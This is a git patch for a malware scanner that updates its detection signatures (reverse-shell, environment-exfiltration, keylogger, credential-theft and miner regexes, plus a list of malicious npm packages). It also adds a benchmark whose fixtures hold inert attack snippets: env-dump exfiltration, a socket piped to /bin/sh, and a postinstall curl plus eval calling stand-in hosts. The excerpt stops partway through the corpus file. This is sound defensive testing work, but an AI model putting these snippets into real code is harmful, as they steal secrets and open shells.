From aac6fd585f40254de7778ce1447be4faf97ac115 Mon Sep 17 00:00:00 2001 From: Tomas Tilnak <14878713+tiltom@users.noreply.github.com> Date: Mon, 13 Jul 2026 21:03:20 +0200 Subject: [PATCH 1/4] feat: add reproducible security benchmark --- .gitignore | 1 + assets/signatures-snapshot.json | 454 +- benchmark/README.md | 64 + benchmark/corpus.json | 482 +++ benchmark/corpus.lock.json | 1534 +++++++ benchmark/github-projects.json | 34 + benchmark/osv-malicious-packages.json | 35 + benchmark/pin-corpus.mjs | 141 + benchmark/reference-review.json | 36 + benchmark/results/post-fix-final.csv | 91 + benchmark/results/post-fix-final.json | 4589 +++++++++++++++++++++ benchmark/results/pre-fix-baseline.csv | 91 + benchmark/results/pre-fix-baseline.json | 4997 +++++++++++++++++++++++ benchmark/run.mjs | 677 +++ package-lock.json | 8 +- package.json | 4 +- tests/scan.test.ts | 2 +- 17 files changed, 13186 insertions(+), 54 deletions(-) create mode 100644 benchmark/README.md create mode 100644 benchmark/corpus.json create mode 100644 benchmark/corpus.lock.json create mode 100644 benchmark/github-projects.json create mode 100644 benchmark/osv-malicious-packages.json create mode 100644 benchmark/pin-corpus.mjs create mode 100644 benchmark/reference-review.json create mode 100644 benchmark/results/post-fix-final.csv create mode 100644 benchmark/results/post-fix-final.json create mode 100644 benchmark/results/pre-fix-baseline.csv create mode 100644 benchmark/results/pre-fix-baseline.json create mode 100644 benchmark/run.mjs diff --git a/.gitignore b/.gitignore index f5d9e55..6b75e85 100644 --- a/.gitignore +++ b/.gitignore @@ -2,3 +2,4 @@ node_modules/ dist/ *.tgz .DS_Store +benchmark/results/ diff --git a/assets/signatures-snapshot.json b/assets/signatures-snapshot.json index 0282bc3..38f4afe 100644 --- a/assets/signatures-snapshot.json +++ b/assets/signatures-snapshot.json @@ -1,6 +1,6 @@ { - "version": "2026.07.08.002", - "lastUpdated": "2026-07-09T09:25:31.727Z", + "version": "2026.07.12.003", + "lastUpdated": "2026-07-13T18:56:08.001Z", "maliciousPackages": [ { "name": "beavertail", @@ -73,6 +73,9 @@ "name": "bcrypts-js", "severity": "high", "source": "npm-audit", + "versions": [ + "2.4.4" + ], "description": "Typosquat of 'bcrypt-js'" }, { @@ -87,6 +90,150 @@ "source": "npm-audit", "description": "Typosquat of 'express'" }, + { + "name": "axios.js", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2025-4275)" + }, + { + "name": "axiosqqq", + "severity": "high", + "source": "openssf-osv", + "versions": [ + "1.16.2", + "1.16.3", + "1.16.9", + "1.16.13" + ], + "description": "Confirmed malicious npm package (MAL-2026-4493)" + }, + { + "name": "axioss", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2025-15242)" + }, + { + "name": "babel-laoder", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2025-15281)" + }, + { + "name": "babel-loadre", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2025-15282)" + }, + { + "name": "babel-loqder", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2025-15283)" + }, + { + "name": "babel-node", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2025-15286)" + }, + { + "name": "babel-pal", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2025-15289)" + }, + { + "name": "axios-http", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2025-15238)" + }, + { + "name": "axios-proxy", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2023-116)" + }, + { + "name": "axios-browserify", + "severity": "high", + "source": "openssf-osv", + "versions": [ + "1.0.0" + ], + "description": "Confirmed malicious npm package (MAL-2025-4813)" + }, + { + "name": "axios-builder", + "severity": "high", + "source": "openssf-osv", + "versions": [ + "1.2.1" + ], + "description": "Confirmed malicious npm package (MAL-2025-190832)" + }, + { + "name": "axios-mockadptr", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2024-10692)" + }, + { + "name": "axios-cancelable", + "severity": "high", + "source": "openssf-osv", + "versions": [ + "1.0.1", + "1.0.2" + ], + "description": "Confirmed malicious npm package (MAL-2025-191389)" + }, + { + "name": "babel-plugin-blocks", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2026-2631)" + }, + { + "name": "babel-ganache", + "severity": "high", + "source": "openssf-osv", + "versions": [ + "2.2.4", + "2.2.6", + "2.2.7" + ], + "description": "Confirmed malicious npm package (MAL-2025-47613)" + }, + { + "name": "babel-js", + "severity": "high", + "source": "openssf-osv", + "versions": [ + "1.0.1" + ], + "description": "Confirmed malicious npm package (MAL-2026-407)" + }, + { + "name": "babel-npm-install", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2025-15287)" + }, + { + "name": "babel-npm-publish", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2025-15288)" + }, + { + "name": "babel-loader-fs", + "severity": "high", + "source": "openssf-osv", + "description": "Confirmed malicious npm package (MAL-2025-3985)" + }, { "name": "colourama", "severity": "high", @@ -133,15 +280,17 @@ "severity": "critical", "fileExtensions": [ ".js", - ".ts", + ".jsx", ".mjs", - ".cjs" + ".cjs", + ".ts", + ".tsx" ] }, { "id": "BEAVERTAIL_EXFIL", "name": "BeaverTail Data Exfiltration", - "pattern": "process\\.env.*JSON\\.stringify.*fetch|axios\\.post", + "pattern": "JSON\\.stringify\\s*\\(\\s*process\\.env\\s*\\)[\\s\\S]{0,2000}(?:fetch\\s*\\(|axios\\.post\\s*\\()", "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST", "tags": [ "lazarus", @@ -152,9 +301,11 @@ "severity": "critical", "fileExtensions": [ ".js", - ".ts", + ".jsx", ".mjs", - ".cjs" + ".cjs", + ".ts", + ".tsx" ] }, { @@ -176,7 +327,7 @@ { "id": "REVERSE_SHELL", "name": "Reverse Shell Pattern", - "pattern": "\\bnet\\.Socket\\(\\)|socket\\.socket.*SOCK_STREAM.*connect", + "pattern": "(?:net\\.Socket\\(\\)[\\s\\S]{0,2000}(?:child_process|/bin/(?:sh|bash)|cmd\\.exe)|(?:child_process|/bin/(?:sh|bash)|cmd\\.exe)[\\s\\S]{0,2000}net\\.Socket\\(\\))", "description": "Socket-based reverse shell connection — creates a TCP connection back to attacker", "tags": [ "shell", @@ -186,14 +337,18 @@ "severity": "critical", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py" ] }, { "id": "CRYPTO_MINER", "name": "Cryptocurrency Miner", - "pattern": "stratum\\+tcp://|xmrig|cryptonight|monero", + "pattern": "stratum\\+tcp://|xmrig|cryptonight", "description": "Cryptocurrency mining code — uses CPU resources for attacker profit", "tags": [ "miner", @@ -203,26 +358,43 @@ "severity": "critical", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", - ".sh" + ".rb", + ".php", + ".go", + ".sh", + ".ps1", + ".psm1" ] }, { "id": "CREDENTIAL_THEFT", "name": "Browser Credential Theft", - "pattern": "chrome.*Login Data|firefox.*logins\\.json|keychain", - "description": "Reads browser password databases (Chrome Login Data, Firefox logins.json, macOS Keychain)", + "pattern": "chrome.*Login Data|firefox.*logins\\.json|find-generic-password|find-internet-password|dump-keychain", + "description": "Reads browser password databases (Chrome Login Data, Firefox logins.json) or dumps the macOS Keychain via the security(1) command", "tags": [ "credentials", "theft", "stealer" ], - "severity": "critical", + "severity": "high", + "confidence": "medium", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", + ".rb", + ".php", + ".go", ".sh" ] }, @@ -239,7 +411,11 @@ "severity": "high", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py" ] }, @@ -256,7 +432,11 @@ "severity": "high", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py" ] }, @@ -270,11 +450,14 @@ "eval", "payload" ], - "severity": "high", + "severity": "critical", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", - ".mjs" + ".tsx" ] }, { @@ -290,8 +473,15 @@ "severity": "critical", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", + ".rb", + ".php", + ".go", ".sh", ".env", ".json", @@ -312,8 +502,15 @@ "severity": "critical", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", + ".rb", + ".php", + ".go", ".sh", ".yaml", ".yml" @@ -332,25 +529,40 @@ "severity": "critical", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", - ".py" + ".tsx", + ".py", + ".rb", + ".php", + ".go" ] }, { "id": "HARDCODED_API_KEY", "name": "Hardcoded API Key", "pattern": "(?:api[_-]?key|apikey|secret[_-]?key|auth[_-]?token|private[_-]?key)\\s*[:=]\\s*['\"]([^'\"]{20,})['\"]", - "description": "Generic API key / secret key pattern assigned to a variable", + "description": "Generic API key / secret key pattern assigned to a variable (obvious placeholders are downgraded by scanner context)", "tags": [ "secrets", "credentials", "api-key" ], - "severity": "critical", + "severity": "high", + "confidence": "medium", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", - ".py" + ".tsx", + ".py", + ".rb", + ".php", + ".go" ] }, { @@ -363,11 +575,19 @@ "database", "credentials" ], - "severity": "high", + "severity": "medium", + "confidence": "medium", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", + ".rb", + ".php", + ".go", ".env" ] }, @@ -384,9 +604,18 @@ "severity": "critical", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", - ".sh" + ".rb", + ".php", + ".go", + ".sh", + ".ps1", + ".psm1" ] }, { @@ -402,8 +631,15 @@ "severity": "high", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", + ".rb", + ".php", + ".go", ".sh" ] }, @@ -420,9 +656,18 @@ "severity": "medium", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", - ".sh" + ".rb", + ".php", + ".go", + ".sh", + ".ps1", + ".psm1" ] }, { @@ -438,8 +683,15 @@ "severity": "medium", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", + ".rb", + ".php", + ".go", ".sh" ] }, @@ -456,9 +708,18 @@ "severity": "high", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", - ".sh" + ".rb", + ".php", + ".go", + ".sh", + ".ps1", + ".psm1" ] }, { @@ -474,8 +735,15 @@ "severity": "medium", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", + ".rb", + ".php", + ".go", ".sh" ] }, @@ -489,10 +757,15 @@ "clipboard", "data-theft" ], - "severity": "high", + "severity": "medium", + "confidence": "medium", "fileExtensions": [ ".js", - ".ts" + ".jsx", + ".mjs", + ".cjs", + ".ts", + ".tsx" ] }, { @@ -505,26 +778,38 @@ "cookies", "session-theft" ], - "severity": "high", + "severity": "medium", + "confidence": "medium", "fileExtensions": [ ".js", - ".ts" + ".jsx", + ".mjs", + ".cjs", + ".ts", + ".tsx" ] }, { "id": "EXFIL_KEYLOGGER", - "name": "Keylogger Pattern", - "pattern": "(?:addEventListener|on)\\s*\\(\\s*['\"](?:keydown|keypress|keyup)['\"]", - "description": "Keyboard event listener (keydown/keypress) — captures user keystrokes", + "name": "Keyboard Capture and Transmission", + "pattern": "(?:addEventListener\\s*\\(\\s*['\"](?:keydown|keypress|keyup)['\"]|\\.on(?:keydown|keypress|keyup)\\s*=)", + "description": "Reads pressed keys from a keyboard handler and stores or transmits them", "tags": [ "exfiltration", "keylogger", - "credential-theft" + "credential-theft", + "behavioral-chain" ], "severity": "critical", + "confidence": "high", + "context": "keyboard-capture", "fileExtensions": [ ".js", - ".ts" + ".jsx", + ".mjs", + ".cjs", + ".ts", + ".tsx" ] }, { @@ -540,7 +825,11 @@ "severity": "critical", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py" ] }, @@ -557,7 +846,11 @@ "severity": "critical", "fileExtensions": [ ".js", - ".ts" + ".jsx", + ".mjs", + ".cjs", + ".ts", + ".tsx" ] }, { @@ -570,11 +863,19 @@ "auth-bypass", "hardcoded" ], - "severity": "critical", + "severity": "medium", + "confidence": "low", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", - ".py" + ".tsx", + ".py", + ".rb", + ".php", + ".go" ] }, { @@ -591,7 +892,11 @@ "severity": "critical", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py" ] }, @@ -608,7 +913,11 @@ "severity": "critical", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py" ] }, @@ -625,20 +934,30 @@ "severity": "critical", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py" ] }, { "id": "SOCIAL_ENGINEERING_SECURITY_BYPASS", "name": "Security Bypass Instructions in README", - "pattern": "(?:disable|turn off|bypass)[\\s\\w]*(?:antivirus|firewall|security|protection)", + "pattern": "(?:disable|turn off|bypass)[\\s\\w]{0,30}(?:antivirus|firewall|windows defender|gatekeeper|smartscreen|real-time protection|security software|security tool)", "description": "README instructs users to disable antivirus, firewall, or security tools", "tags": [ "social-engineering", "security-bypass" ], - "severity": "high" + "severity": "medium", + "confidence": "low", + "fileNames": [ + "README.md", + "README.txt", + "README" + ] }, { "id": "OBF_BASE64_HEAVY", @@ -650,13 +969,21 @@ "obfuscation" ], "severity": "medium", + "confidence": "low", "minMatches": 6, "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", + ".tsx", ".py", + ".rb", + ".php", ".sh", - ".ps1" + ".ps1", + ".psm1" ] }, { @@ -669,11 +996,18 @@ "obfuscation" ], "severity": "medium", + "confidence": "low", "minMatches": 20, "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", - ".py" + ".tsx", + ".py", + ".rb", + ".php" ] }, { @@ -686,11 +1020,15 @@ "dynamic-code", "obfuscation" ], - "severity": "high", + "severity": "medium", + "confidence": "low", "fileExtensions": [ ".js", + ".jsx", + ".mjs", + ".cjs", ".ts", - ".mjs" + ".tsx" ] }, { @@ -703,10 +1041,15 @@ "dynamic-code", "obfuscation" ], - "severity": "high", + "severity": "medium", + "confidence": "low", "fileExtensions": [ ".js", - ".ts" + ".jsx", + ".mjs", + ".cjs", + ".ts", + ".tsx" ] }, { @@ -719,10 +1062,15 @@ "dynamic-code", "obfuscation" ], - "severity": "high", + "severity": "medium", + "confidence": "low", "fileExtensions": [ ".js", - ".ts" + ".jsx", + ".mjs", + ".cjs", + ".ts", + ".tsx" ] }, { @@ -736,24 +1084,34 @@ "eval-bypass" ], "severity": "medium", + "confidence": "low", "fileExtensions": [ ".js", - ".ts" + ".jsx", + ".mjs", + ".cjs", + ".ts", + ".tsx" ] }, { "id": "OBF_CHARCODE_ARRAY", "name": "Large Character Code Array", - "pattern": "\\[(?:\\s*\\d{2,3}\\s*,\\s*){20,}\\d{2,3}\\s*\\]", + "pattern": "\\[\\s*(?:\\d{2,3}\\s*,\\s*){20,}\\d{2,3}\\s*\\]", "description": "Array of 20+ numbers that look like char codes. Used as an alternative to fromCharCode to build malicious strings character by character.\n", "tags": [ "charcode-array", "obfuscation" ], "severity": "medium", + "confidence": "low", "fileExtensions": [ ".js", - ".ts" + ".jsx", + ".mjs", + ".cjs", + ".ts", + ".tsx" ] } ], diff --git a/benchmark/README.md b/benchmark/README.md new file mode 100644 index 0000000..3458e3c --- /dev/null +++ b/benchmark/README.md @@ -0,0 +1,64 @@ +# Flagrix benchmark + +This benchmark evaluates the same `@flagrix/scanner-core` engine used by the +CLI and browser extension. It never clones repositories, installs packages, or +executes sample code. + +## Safety model + +- Critical fixtures are inert source strings served through an in-memory mock + of the GitHub API. They are parsed by the scanner but never written or run. + The reverse-shell fixture includes both socket and shell-process behavior; + the AWS fixture uses a non-documentation dummy so reserved AWS examples stay + valid negative controls. +- Malicious-package fixtures contain only inert dependency manifests derived + from 25 non-withdrawn OpenSSF OSV reports pinned by repository commit and + report blob SHA. Package archives and package source are never downloaded. +- Public repositories are read from immutable GitHub blobs at a 40-character + commit SHA. The harness batches text-blob reads through GitHub GraphQL while + preserving the scanner's exact selected-file contents and REST-shaped input. +- Moving branches are rejected by the runner. `benchmark:pin` resolves them to + SHAs and writes `corpus.lock.json` before evaluation. +- Live malware archives are out of scope for this public/safe harness. A future + private corpus can use independently labeled package metadata or source that + has been unpacked in a disposable, network-disabled analysis environment. + +## Commands + +```bash +# Deterministic, offline baseline of the ten claimed critical behaviors +npm run benchmark -- --corpus critical-fixture + +# Pin every GitHub target without cloning it +FLAGRIX_GITHUB_TOKEN=... npm run benchmark:pin + +# Explicitly advance public repositories to their current heads +FLAGRIX_GITHUB_TOKEN=... npm run benchmark:pin -- --refresh + +# Run all pinned samples (resume skips completed rows) +FLAGRIX_GITHUB_TOKEN=... npm run benchmark -- --resume +``` + +The token should be a fine-grained, read-only GitHub PAT. Do not pass it via +`--token`, because command-line arguments can appear in process listings. If +`FLAGRIX_GITHUB_TOKEN` is absent, the scripts securely reuse `gh auth token`, +so an interactive `gh auth login -h github.com` is the easiest local setup. + +Outputs are written to `benchmark/results/`: + +- `latest.json`: complete structured run and aggregate metrics +- `latest.csv`: flat, spreadsheet-friendly sample results + +## Corpus semantics + +`reference-clean` means a project selected as a false-alarm reference at one +specific commit. It is not a claim that the project is vulnerability-free or +benign forever. Any High/Critical finding requires manual review and a note in +the result workbook before it is classified as a false positive. + +Launch-gate defaults: + +- 100% of critical fixtures detected in the expected category +- at least 90% independently labeled malicious samples detected +- zero Critical findings in reference-clean samples +- no more than 5% reference-clean samples with a High verdict diff --git a/benchmark/corpus.json b/benchmark/corpus.json new file mode 100644 index 0000000..b5d21f7 --- /dev/null +++ b/benchmark/corpus.json @@ -0,0 +1,482 @@ +{ + "benchmarkVersion": "0.1.0", + "sources": [ + { + "name": "OpenSSF Malicious Packages", + "url": "https://github.com/ossf/malicious-packages", + "usage": "Independent labels and package/version metadata; withdrawn reports must be excluded." + }, + { + "name": "Datadog malicious software packages dataset", + "url": "https://github.com/DataDog/malicious-software-packages-dataset", + "usage": "Human-triaged private static-sample evaluation only; archives must never be executed." + }, + { + "name": "GitHub Amalfi artifact", + "url": "https://github.com/githubnext/amalfi-artifact", + "usage": "Methodology comparison and externally labeled experiment data." + } + ], + "samples": [ + { + "sampleId": "critical-keylogger-exfil-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed behavior: keyboard capture plus network sink", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": ["EXFIL_KEYLOGGER"], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture() { document.addEventListener('keydown', event => { fetch('https://example.invalid/collect', { method: 'POST', body: event.key }) }) }\n" + } + } + }, + { + "sampleId": "critical-beavertail-loader-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed Lazarus BeaverTail loader structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": ["BEAVERTAIL_LOADER_V1"], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture() { require('child_process').exec('curl https://example.invalid/payload') }\n" + } + } + }, + { + "sampleId": "critical-env-exfil-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed environment-variable exfiltration structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": ["BEAVERTAIL_EXFIL"], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture() { const body = JSON.stringify(process.env); fetch('https://example.invalid/collect', { method: 'POST', body }) }\n" + } + } + }, + { + "sampleId": "critical-reverse-shell-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed reverse-shell socket structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": ["REVERSE_SHELL"], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture(net) { const socket = net.Socket(); const shell = require('child_process').spawn('/bin/sh'); socket.pipe(shell.stdin); shell.stdout.pipe(socket); return socket }\n" + } + } + }, + { + "sampleId": "critical-crypto-miner-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed cryptocurrency-miner endpoint structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": ["CRYPTO_MINER"], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export const inertPoolReference = 'stratum+tcp://example.invalid:3333'\n" + } + } + }, + { + "sampleId": "critical-obfuscated-eval-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed Base64-decoded dynamic execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": ["OBFUSCATED_EVAL"], + "minimumExpectedVerdict": "medium", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture(encoded) { if (false) eval(atob(encoded)) }\n" + } + } + }, + { + "sampleId": "critical-rce-endpoint-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed request-driven remote-code-execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": ["BACKDOOR_RCE_ENDPOINT"], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture(req) { if (false) eval(req.body.command) }\n" + } + } + }, + { + "sampleId": "critical-credential-file-read-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed credential-file access structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": ["FILE_ACCESS_CREDENTIALS"], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export function inertFixture(fs) { if (false) fs.readFileSync('/home/example/.ssh/id_rsa') }\n" + } + } + }, + { + "sampleId": "critical-aws-key-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed AWS access-key pattern using a reserved dummy value", + "sourceUrl": "https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": ["HARDCODED_AWS_KEY"], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "src/fixture.js": "export const inertDummyAwsKey = 'AKIA1234567890ABCDEF'\n" + } + } + }, + { + "sampleId": "critical-install-script-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed install-time download and dynamic execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1", + "expectedDetectionCategories": ["POSTINSTALL_SCRIPT"], + "minimumExpectedVerdict": "high", + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"inert-install-fixture\",\"version\":\"1.0.0\",\"scripts\":{\"postinstall\":\"curl https://example.invalid/payload && node -e \\\"eval('')\\\"\"}}\n" + } + } + }, + { + "sampleId": "reference-fixture-keyboard-shortcut-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for ordinary keyboard UI handling", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "fixture", + "files": { + "src/ui.js": "document.addEventListener('keydown', event => { if (event.key === 'Escape') closeModal() })\n" + } + } + }, + { + "sampleId": "reference-fixture-placeholder-secret-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for documented placeholder configuration", + "sourceUrl": "https://github.com/9valleb9/SPY-Options-Dashboard", + "immutableRef": "fixture-v1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "fixture", + "files": { + "app.py": "app.secret_key = 'your-secret-key-change-in-production'\n" + } + } + }, + { + "sampleId": "reference-fixture-flask-debug-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control: deployment warning must not be labeled a backdoor", + "sourceUrl": "https://github.com/9valleb9/SPY-Options-Dashboard", + "immutableRef": "fixture-v1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "fixture", + "files": { + "app.py": "app.run(debug=True, host='0.0.0.0', port=5000)\n" + } + } + }, + { + "sampleId": "reference-fixture-detector-regex-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for security tools containing inert detector regexes", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "fixture", + "files": { + "src/rules.js": "export const keyloggerPattern = /addEventListener\\(['\\\"']keydown/gi\nexport const minerPattern = /stratum\\+tcp:\\/\\//gi\n" + } + } + }, + { + "sampleId": "reference-fixture-event-stream-safe-version-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Version-bound negative control for the compromised event-stream 3.3.6 incident", + "sourceUrl": "https://github.com/dominictarr/event-stream", + "immutableRef": "package:event-stream@4.0.1", + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { + "kind": "fixture", + "files": { + "package.json": "{\"name\":\"reference-consumer\",\"version\":\"1.0.0\",\"dependencies\":{\"event-stream\":\"4.0.1\"}}\n" + } + } + }, + { + "sampleId": "reference-express", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/expressjs/express", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "expressjs/express", "ref": null } + }, + { + "sampleId": "reference-fastify", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/fastify/fastify", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "fastify/fastify", "ref": null } + }, + { + "sampleId": "reference-koa", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/koajs/koa", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "koajs/koa", "ref": null } + }, + { + "sampleId": "reference-axios", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/axios/axios", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "axios/axios", "ref": null } + }, + { + "sampleId": "reference-lodash", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/lodash/lodash", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "lodash/lodash", "ref": null } + }, + { + "sampleId": "reference-chalk", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/chalk/chalk", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "chalk/chalk", "ref": null } + }, + { + "sampleId": "reference-uuid", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/uuidjs/uuid", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "uuidjs/uuid", "ref": null } + }, + { + "sampleId": "reference-node-fetch", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/node-fetch/node-fetch", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "node-fetch/node-fetch", "ref": null } + }, + { + "sampleId": "reference-react", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/facebook/react", + "immutableRef": null, + "maximumExpectedVerdict": "low", + "expectedDetectionCategories": [], + "target": { "kind": "github", "repo": "facebook/react", "ref": null } + }, + { + "sampleId": "reference-vue", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vuejs/core", + "immutableRef": 